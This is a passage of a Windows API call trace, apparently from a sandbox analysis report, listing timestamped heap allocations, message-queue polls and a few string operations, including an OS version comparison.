lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0199.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0199.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.699] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0199.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.699] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0199.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0199.703] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0199.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0199.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0199.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c08 [0199.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0199.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0199.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0199.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0199.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0199.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0199.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0199.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0199.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0199.704] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0199.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0199.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0199.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0199.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0199.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0199.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0199.705] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0199.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0199.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0199.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0199.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0199.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0199.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0199.705] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0199.705] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0199.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0199.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0199.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0199.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0199.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0199.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0199.706] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0199.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0199.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0199.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0199.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.707] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0199.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0199.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0199.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0199.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0199.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0199.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0199.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0199.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0199.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0199.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0199.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.722] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0199.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0199.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0199.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0199.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0199.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0199.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0199.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0199.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0199.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0199.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0199.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0199.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0199.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0199.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.723] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0199.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0199.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0199.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b30f8 [0199.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0199.724] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0199.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0199.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c48 [0199.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0199.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0199.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0b0 [0199.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0199.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0199.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0199.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0199.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0199.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0199.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0199.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0199.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0199.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0199.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0199.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0199.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0199.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0199.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0199.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.726] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0199.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0199.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0199.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0199.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0199.726] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0199.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa110 [0199.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0199.726] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0199.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0199.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0199.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0199.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0199.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0199.727] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0199.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0199.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0199.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0199.727] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0199.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0199.727] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0199.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0199.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0199.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0199.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0199.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0199.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0199.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0199.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0199.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0199.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0199.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0199.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0199.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0199.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0199.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 